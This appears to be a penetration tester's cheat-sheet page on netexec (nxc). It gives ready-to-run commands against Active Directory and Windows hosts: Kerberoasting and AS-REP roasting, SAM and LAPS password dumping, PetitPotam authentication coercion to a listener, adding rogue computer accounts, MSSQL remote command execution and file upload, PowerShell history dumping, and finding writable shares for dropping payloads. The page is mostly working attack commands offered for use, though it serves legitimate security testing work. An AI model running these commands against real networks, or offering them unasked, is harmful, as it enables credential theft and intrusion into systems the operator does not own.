# netexec (nxc) [nxc](https://www.netexec.wiki/) "is a network service exploitation tool that helps automate assessing the security of large networks." Check out the BHIS [cheat sheet](https://www.blackhillsinfosec.com/netcat-cheatsheet/) on this topic. ## Generate a hosts file ``` nxc smb 10.3.10.0/24 --generate-hosts-file hosts.txt ``` ### Append the generated hosts file to your actual /etc/hosts file ``` sudo cat hosts.txt >> /etc/hosts ```` ## Check for vulnerable certificates ``` nxc ldap domain.com -u user -p pass -M certipy-find ``` ## Check Machine Account Quota (MAQ) value ``` nxc ldap domain.com -u user -p pass -M maq ``` ## Basic SMB auth ``` nxc smb somehost -u user -p 'Winter2027!' ``` ### Basic SMB auth (Kerberos) I like to use [getTGT](/pentesting/Internal/gettgt.md), then `export KRB5CCNAME=user.ccache` and then here are some enumeration examples: Connect to host with SMB: ``` nxc smb server.domain.com --use-kcache ``` ## Turn on logging To log every nxc command and output to a file, find the `nxc.conf` file (in my Kali it was at `/home/kali/.nxc/nxc.conf`) and enable logging: ``` log_mode = True ``` ## Change the Pwn3d label You can make that something more professional if you want - just edit the `/home/kali/.nxc/nxc.conf` file and change: ``` pwn3d_label = Compromised! ``` ## ASREPRoasting ``` nxc ldap dc1.domain.com -u you -p 'Arnold123!' --asreproast asrep.txt ``` ## Kerberoasting ``` nxc ldap domain.com -u lowpriv -p JingleAllTheWay! --kerberoasting kerbs.txt ``` !!!tip If you have a ton of Kerberoastable users, you can see them a little easier if you grep the output to include just the usernames: ``` grep -oP '\$krb5tgs\$\d+\$\*\K[^$]+' kerbs.txt | tr '[:lower:]' '[:upper:]' | sort -fu ``` !!! ## Find shares ``` nxc smb pcs.txt -u 'username' -p 'password' --shares ``` ### Filtering shares If you want to find just READ/WRITE shares for example: ``` nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE ``` Or just WRITE: ``` nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE ``` ### Cleaning up share list from log file If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky [farmer](/pentesting/Internal/farmer) payloads. ``` grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt ``` ## Find hosts with/without SMB signing ``` nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt ``` ## Find hosts with/without SMB signing (alternate way) ### grep for anything where signing is set to false ``` nxc smb pcs.txt -u '' -p '' > signingcheck.txt ``` If you want to get kind of fancy-pantsy you can take that `grep` to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name: ``` cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt ``` ## Find hosts running WebClient service ``` nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav ``` ## Find pre-created computer accounts ``` nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k ``` ## Dump SAM database ``` nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam ``` ## Coerce authentication The nxc [wiki](https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities) has an interesting page on this - talking about the various ways nxc can coerce authentication. :::note Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L. This also applies to the names of the vulnerabilities when specifying a method. M=p // Invalid, as both petitpotam and printerbug start with ā€˜pā€™ so modules gives error M=pr // Matches printerbug M=pe // Matches petitpotam M=dfs // Matches dfscoerce ::: ### Coerce via PetitPotam: ``` nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe ``` ### Add computer to the domain ``` nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123! ``` ## MSSQL commands *Lifted from the [nxc wiki](https://www.netexec.wiki/mssql-protocol/mssql-command)* ### Execute database commands ``` nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;' ``` ### Get/put files Get: ``` nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file.txt /tmp/file ``` Put: ``` nxc mssql 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt ``` ### Execute commands ``` nxc mssql 1.2.3.4 -u localdbuser -p 'Winter2026!' --local-auth -x 'dir c:\' ``` ## Dump LAPS passwords Using an account with rights to do so: ``` nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps ``` ## Check LDAP channel binding ``` nxc ldap dc1.domain.com -u myuser -p 'MeowMeow123!' -M ldap-checker ``` ## Dump PowerShell history ``` nxc smb 192.168.1.5 -u user -p password -M powershell_history -o export=True ``` ## See who's logged in ``` nxc smb 192.168.7.7 -u user -p password --qwinsta ``` ## List running tasks ``` nxc smb 192.168.7.7 -u user -p password --tasklist ```